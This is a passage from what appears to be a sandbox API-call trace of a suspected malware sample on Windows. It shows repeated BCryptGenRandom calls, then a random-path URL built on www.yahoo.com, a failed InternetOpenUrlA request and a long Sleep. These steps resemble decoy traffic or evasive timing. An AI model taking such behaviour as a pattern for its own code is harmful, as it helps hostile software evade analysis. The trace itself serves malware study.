| out: pbBuffer=0x46ffd5f) returned 0x0 [0271.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.092] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.092] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1808c, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a1808c) returned 0x0 [0271.092] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.092] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.093] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.093] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.093] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.093] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.094] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.094] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.095] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a180bb, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a180bb) returned 0x0 [0271.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.242] GetProcessHeap () returned 0x440000 [0271.242] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0271.242] lstrcpyA (in: lpString1=0x472f30, lpString2="z7¾ys://www.yahoo.com" | out: lpString1="z7¾ys://www.yahoo.com") returned="z7¾ys://www.yahoo.com" [0271.242] lstrcatA (in: lpString1="z7¾ys://www.yahoo.com", lpString2="/c8qtrd464ae9yw440vtjxsvuyhrg5aKBq33luwkmWw/Pceg4es1hjg8agrvowyv9r1t4vlkdvavdmm8pqc5l4dhVt/po4bb48bitxm6xbv189oW1iox1w4yZuw7rotZzTgzq69sl/" | out: lpString1="z7¾ys://www.yahoo.com/c8qtrd464ae9yw440vtjxsvuyhrg5aKBq33luwkmWw/Pceg4es1hjg8agrvowyv9r1t4vlkdvavdmm8pqc5l4dhVt/po4bb48bitxm6xbv189oW1iox1w4yZuw7rotZzTgzq69sl/") returned="z7¾ys://www.yahoo.com/c8qtrd464ae9yw440vtjxsvuyhrg5aKBq33luwkmWw/Pceg4es1hjg8agrvowyv9r1t4vlkdvavdmm8pqc5l4dhVt/po4bb48bitxm6xbv189oW1iox1w4yZuw7rotZzTgzq69sl/" [0271.243] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0271.243] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="z7¾ys://www.yahoo.com/c8qtrd464ae9yw440vtjxsvuyhrg5aKBq33luwkmWw/Pceg4es1hjg8agrvowyv9r1t4vlkdvavdmm8pqc5l4dhVt/po4bb48bitxm6xbv189oW1iox1w4yZuw7rotZzTgzq69sl/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0271.243] GetProcessHeap () returned 0x440000 [0271.243] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0271.243] GetProcessHeap () returned 0x440000 [0271.243] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a18060 | out: hHeap=0x440000) returned 1 [0271.243] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0271.243] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0271.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0271.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0271.244] Sleep (dwMilliseconds=0x1143f) [0271.366] GetProcAddress (hModule=0x7ffc5bcc0000, 